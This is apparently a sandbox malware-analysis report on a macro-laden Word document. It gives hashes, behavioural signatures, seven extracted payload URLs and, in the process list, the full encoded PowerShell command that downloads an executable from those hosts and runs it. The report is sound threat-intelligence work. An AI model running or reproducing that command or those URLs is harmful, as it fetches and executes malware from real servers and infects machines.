Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
24/08/2024, 16:56
Static task
static1
Behavioral task
behavioral1
Sample
bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc
-
Size
202KB
-
MD5
bf0b0a3501aeb456a2513f8bd43f558a
-
SHA1
b17d1b89ea913666b7eacb2fddad6f1cc045a63a
-
SHA256
00aa2833332261ee444a5437a5ab56474bb743924d2d1be87777f4fa2a1688c5
-
SHA512
cbbdb24c134370184b497dfae451de094ac56e4eacf07f69268347bd81e9e9290536ddcb9b7730a754fc11a76afa263960502d0e701ef1c194ed88001ecdac4a
-
SSDEEP
3072:dUqJ1NgsA8k/gvh0NZ0lGX1nZ7ZYpSgKsiEHE+b64JE:dBtgVIveNZvn6zKjEkc6cE
Malware Config
Extracted
http://bavhome.com/wp-content/td/
http://hercinovic.com/cgi-bin/mZt/
https://jeffdahlke.com/css/3u/
http://calledtochange.org/CalledtoChange/V/
http://daoisthealing.com/cgi-bin/c/
https://scyzm.net/wp-content/j/
http://www.bismarjeparamebel.com/u/pCp/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 2720 POwersheLL.exe 31 -
Blocklisted process makes network request 8 IoCs
flow pid Process 5 2988 POwersheLL.exe 7 2988 POwersheLL.exe 9 2988 POwersheLL.exe 11 2988 POwersheLL.exe 12 2988 POwersheLL.exe 14 2988 POwersheLL.exe 16 2988 POwersheLL.exe 18 2988 POwersheLL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{51C89545-105D-4269-8531-4126605D3132}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{51C89545-105D-4269-8531-4126605D3132}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\TypeLib\{51C89545-105D-4269-8531-4126605D3132}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{51C89545-105D-4269-8531-4126605D3132}\2.0 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{51C89545-105D-4269-8531-4126605D3132}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\TypeLib\{51C89545-105D-4269-8531-4126605D3132}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2476 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2988 POwersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2988 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2476 WINWORD.EXE 2476 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2476 wrote to memory of 2280 2476 WINWORD.EXE 35 PID 2476 wrote to memory of 2280 2476 WINWORD.EXE 35 PID 2476 wrote to memory of 2280 2476 WINWORD.EXE 35 PID 2476 wrote to memory of 2280 2476 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bf0b0a3501aeb456a2513f8bd43f558a_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JABCADYAdAAwAGcAZwBnAD0AKAAoACcAUABhACcAKwAnAHcAcABnACcAKwAnAHYAJwApACsAJwBhACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBwAFIAbwBGAGkATABlAFwAeABfAHgANQBWAFoAcgBcAEYAOABCAFkAZQBhAE8AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAYABVAGAAUgBpAHQAeQBgAHAAcgBvAHQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAJwArACcAMgAnACsAJwAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEALAAgACcAKwAnAHQAJwApACsAJwBsAHMAJwApADsAJABIAHUAcgBwAGgAdwBpACAAPQAgACgAKAAnAFkAeQAnACsAJwB4ACcAKQArACcAbgBvACcAKwAnADMAJwApADsAJABMAGIAagB5ADAAZAAxAD0AKAAoACcARwBnAHgAJwArACcAbgAnACkAKwAoACcAbQBkACcAKwAnAGoAJwApACkAOwAkAEQAcwA2ADcANgBlAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0AWABfAHgAJwArACcANQB2AHoAcgB7ADAAfQBGACcAKwAnADgAYgB5AGUAYQBvAHsAMAB9ACcAKQAgACAALQBGAFsAYwBoAEEAUgBdADkAMgApACsAJABIAHUAcgBwAGgAdwBpACsAKAAoACcALgAnACsAJwBlAHgAJwApACsAJwBlACcAKQA7ACQAUwA1ADMAaQB1AGMAYwA9ACgAJwBQACcAKwAnADcANgAnACsAKAAnADEAJwArACcAcQBuAGIAJwApACkAOwAkAFYAeQBlAHkAcgBiAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAGIAYwBsAEkAZQBOAFQAOwAkAFoAXwBoADcAXwB4AGEAPQAoACgAJwBoACcAKwAnAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAYQB2AGgAJwApACsAKAAnAG8AJwArACcAbQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAbgB0AC8AJwArACcAdAAnACkAKwAnAGQAJwArACcALwAqACcAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBoAGUAJwArACcAcgBjAGkAbgBvAHYAJwArACcAaQBjACcAKwAnAC4AJwArACcAYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AYwBnACcAKwAnAGkALQBiACcAKwAnAGkAbgAvACcAKQArACcAbQAnACsAKAAnAFoAdAAnACsAJwAvACoAaAAnACsAJwB0AHQAJwArACcAcABzADoALwAnACkAKwAnAC8AagAnACsAKAAnAGUAJwArACcAZgBmACcAKQArACcAZAAnACsAKAAnAGEAJwArACcAaABsACcAKQArACgAJwBrAGUAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0ALwBjAHMAJwArACcAcwAnACkAKwAnAC8AMwAnACsAKAAnAHUALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoALwAvACcAKQArACgAJwBjAGEAJwArACcAbAAnACkAKwAoACcAbAAnACsAJwBlAGQAJwApACsAKAAnAHQAbwAnACsAJwBjAGgAYQBuACcAKwAnAGcAZQAuAG8AJwApACsAJwByACcAKwAnAGcAJwArACgAJwAvAEMAYQAnACsAJwBsACcAKQArACcAbABlACcAKwAoACcAZAB0ACcAKwAnAG8AQwBoAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAC8AJwApACsAJwBWAC8AJwArACcAKgAnACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AJwApACsAJwBkAGEAJwArACgAJwBvAGkAcwB0ACcAKwAnAGgAZQBhACcAKQArACgAJwBsACcAKwAnAGkAbgBnAC4AYwBvAG0ALwAnACkAKwAnAGMAZwAnACsAKAAnAGkALQBiAGkAbgAnACsAJwAvAGMALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AJwApACsAKAAnAHMAJwArACcAYwB5ACcAKQArACgAJwB6ACcAKwAnAG0ALgBuAGUAdAAnACsAJwAvACcAKQArACcAdwAnACsAJwBwACcAKwAnAC0AJwArACcAYwBvACcAKwAoACcAbgAnACsAJwB0AGUAJwArACcAbgB0AC8AagAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAOgAnACsAJwAvACcAKQArACgAJwAvAHcAJwArACcAdwAnACkAKwAoACcAdwAuACcAKwAnAGIAaQBzAG0AJwApACsAJwBhAHIAJwArACgAJwBqAGUAcABhAHIAYQAnACsAJwBtACcAKwAnAGUAJwArACcAYgBlAGwALgAnACsAJwBjAG8AbQAvAHUAJwApACsAKAAnAC8AJwArACcAcABDAHAAJwApACsAJwAvACcAKQAuACIAUwBgAHAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGcAZAA5ADgAdABpAD0AKAAoACcAVwAwACcAKwAnAG4AagAnACkAKwAoACcAdABoACcAKwAnAHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAGcAZgB1AG4AYQB3ACAAaQBuACAAJABaAF8AaAA3AF8AeABhACkAewB0AHIAeQB7ACQAVgB5AGUAeQByAGIAYwAuACIARABvAGAAVwBgAE4ATABPAEEAZABmAGkAYABMAEUAIgAoACQAVQBnAGYAdQBuAGEAdwAsACAAJABEAHMANgA3ADYAZQBvACkAOwAkAFIAbQA5AHUAdwB0AGUAPQAoACcAWgAnACsAJwA2ACcAKwAoACcAYwBjACcAKwAnAGkAYQB3ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEQAcwA2ADcANgBlAG8AKQAuACIATABgAGUATgBnAHQASAAiACAALQBnAGUAIAAzADcAOQA5ADEAKQAgAHsALgAoACcASQBuAHYAbwBrAGUAJwArACcALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAoACQARABzADYANwA2AGUAbwApADsAJABFAGQAZwBfAG0AbwBoAD0AKAAnAEEAJwArACcAbgAnACsAKAAnAHcAMQAnACsAJwA0ADcAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAVABiAGUAcAByADUAMgA9ACgAKAAnAFMAJwArACcAMABjACcAKQArACgAJwBxAGYAdAAnACsAJwA3ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAGUAbQBlAHMAZABuAD0AKAAoACcAVAAwAHcAZgAnACsAJwBzACcAKQArACcAeQBnACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2988
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5e0723f28bd51d7e2cce864a8e6742b5a
SHA1029a8cc1fe0345a12e5e46983aeeab236f244d26
SHA2569c115dd680395f4550169c57b063d872025bcffca77cc203bb8b67b3c08792b6
SHA512fb4a16def2e96936d59b60380b2e59f929974fe5c7c8d766380d084c19b87bbb236bd6de18b889da7c6868897350877a3f8c806cb9a4af6ac38971cae5fd832f